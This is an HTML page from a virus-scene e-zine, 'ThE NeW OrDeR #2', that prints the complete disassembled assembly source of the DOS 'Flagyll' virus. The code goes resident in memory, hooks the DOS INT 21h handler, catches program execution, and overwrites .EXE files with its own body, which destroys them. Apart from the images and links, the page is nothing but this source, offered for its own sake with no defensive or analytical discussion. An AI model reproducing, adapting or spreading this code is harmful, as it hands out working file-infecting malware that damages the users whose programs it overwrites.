<html>

<head>
<meta http-equiv="Content-Type"
content="text/html; charset=windows-1251">
<meta name="GENERATOR" content="Microsoft FrontPage Express 2.0">
<title>ThE NeW OrDeR #2</title>
</head>

<body bgcolor="#000000" link="#0000FF" vlink="#000080"
bgproperties="fixed" topmargin="15" leftmargin="20" "
vlink="#000080">

<p align="center"><img src="../Images/viruz.gif" width="560"
height="100"></p>

<p align="center"><font color="#FF0000" size="5"><strong><img
src="../images/Rs.jpg" width="640" height="12"></strong></font></p>

<p align="center"><font color="#FF0000" size="5"><strong><img
src="../Images/fogskul.gif" alt="OneHalf  Virii" width="160"
height="100"></strong></font></p>

<p align="center"><font color="#FF0000" size="6"><strong>FLAGYLL</strong></font></p>

<p align="left"><font color="#00FFFF"><strong>;
--------------------------------------------------------------------------<br>
; Disassembled by FairWind / NRG , nrgteam@mail.ru<br>
;
--------------------------------------------------------------------------</strong></font></p>

<p align="left"><font color="#FFFFFF"><strong>.radix 16<br>
cseg segment<br>
model small<br>
assume cs:cseg, ds:cseg, es:cseg<br>
<br>
org 100h<br>
<br>
oi21 equ endflagyll<br>
filelength equ endflagyll - begin<br>
nameptr equ endflagyll+4<br>
DTA equ endflagyll+8<br>
<br>
begin: jmp install_flagyll<br>
<br>
<br>
<br>
install_flagyll:<br>
<br>
mov ax,cs<br>
dec ax<br>
mov ds,ax<br>
cmp byte ptr ds:[0000],5a<br>
jne cancel<br>
mov ax,ds:[0003]<br>
sub ax,100<br>
mov ds:0003,ax<br>
<br>
<br>
copy_flagyll:<br>
mov bx,ax<br>
mov ax,es<br>
add ax,bx<br>
mov es,ax<br>
mov cx,offset endflagyll - begin<br>
mov ax,ds<br>
inc ax<br>
mov ds,ax<br>
lea si,ds:[begin]<br>
lea di,es:0100<br>
rep movsb<br>
<br>
<br>
<br>
hook_21:<br>
<br>
mov ds,cx<br>
mov si,0084h ;<br>
mov di,offset oi21<br>
mov dx,offset check_exec<br>
lodsw<br>
cmp ax,dx ;<br>
je cancel<br>
stosw<br>
movsw<br>
<br>
push es<br>
pop ds<br>
mov ax,2521h<br>
int 21h<br>
<br>
cancel: ret<br>
<br>
check_exec: ;<br>
pushf<br>
<br>
push es<br>
push ds<br>
push ax<br>
push bx<br>
push dx<br>
<br>
cmp ax,04B00h<br>
; executed ?<br>
<br>
<br>
jne abort<br>
<br>
do_infect:<br>
call infect<br>
abort:<br>
pop dx<br>
pop bx<br>
pop ax<br>
pop ds<br>
pop es<br>
popf<br>
<br>
exit:<br>
jmp dword ptr cs:[oi21]<br>
<br>
infect:<br>
jmp over_id<br>
note: db '-=[Crypt Newsletter 13]=-'<br>
<br>
<br>
over_id:<br>
<br>
<br>
<br>
mov cs:[name_seg],ds<br>
mov cs:[name_off],dx<br>
; the name of the file<br>
cld ; clear direction flags<br>
mov word ptr cs:[nameptr],dx<br>
mov word ptr cs:[nameptr+2],ds<br>
<br>
mov ah,2Fh<br>
int 21h<br>
push es<br>
push bx<br>
<br>
push cs<br>
<br>
pop ds<br>
mov dx,offset DTA<br>
mov ah,1Ah<br>
int 21h<br>
<br>
call host_ident<br>
push di<br>
mov si,offset COM_txt<br>
<br>
mov cx,3<br>
rep cmpsb<br>
pop di<br>
jz return<br>
mov si,offset EXE_txt<br>
nop<br>
mov cl,3<br>
rep cmpsb<br>
jnz return<br>
<br>
<br>
<br>
do_exe:<br>
<br>
mov ax,4300h<br>
mov ds,cs:[name_seg]<br>
mov dx,cs:[name_off]<br>
int 21h<br>
and cl,0FEh<br>
mov ax,4301h<br>
int 21h<br>
<br>
mov ds,cs:[name_seg]<br>
mov dx,cs:[name_off]<br>
mov ax,3D02h<br>
int 21h<br>
jc close_file<br>
push cs<br>
pop ds<br>
mov [handle],ax<br>
mov bx,ax<br>
<br>
push cs<br>
pop ds<br>
mov ax,4200h<br>
<br>
push cs<br>
pop ds<br>
mov bx,[handle]<br>
xor cx,cx<br>
xor dx,dx<br>
int 21h<br>
<br>
<br>
<br>
mov ah,40<br>
mov cx,filelength<br>
mov dx,100<br>
int 21h<br>
<br>
close_file: mov bx,[handle]<br>
mov ah,03Eh<br>
int 21h<br>
<br>
mov ax,4C00h<br>
int 21h<br>
<br>
<br>
<br>
<br>
return: mov ah,1Ah<br>
pop dx<br>
pop ds<br>
int 21H<br>
<br>
ret<br>
<br>
host_ident: les di,dword ptr cs:[nameptr]<br>
mov ch,0FFh<br>
mov al,0<br>
repnz scasb<br>
sub di,4<br>
ret<br>
EXE_txt db 'EXE',0<br>
COM_txt db 'COM',0<br>
<br>
name_seg dw ?<br>
name_off dw ?<br>
handle dw ?<br>
<br>
note2: db 'Flagyll'<br>
<br>
endflagyll:<br>
<br>
cseg ends<br>
end begin</strong></font></p>

<p align="center"><a href="../TNO#2_start.htm"><img
src="../images/14ic3.gif" border="0" width="60" height="65"></a></p>

<p align="center"><a href="mailto:nrgteam@mail.ru"><img
src="../images/coollogo_com_7565375.jpg" border="0" width="206"
height="53"></a></p>
</body>
</html>
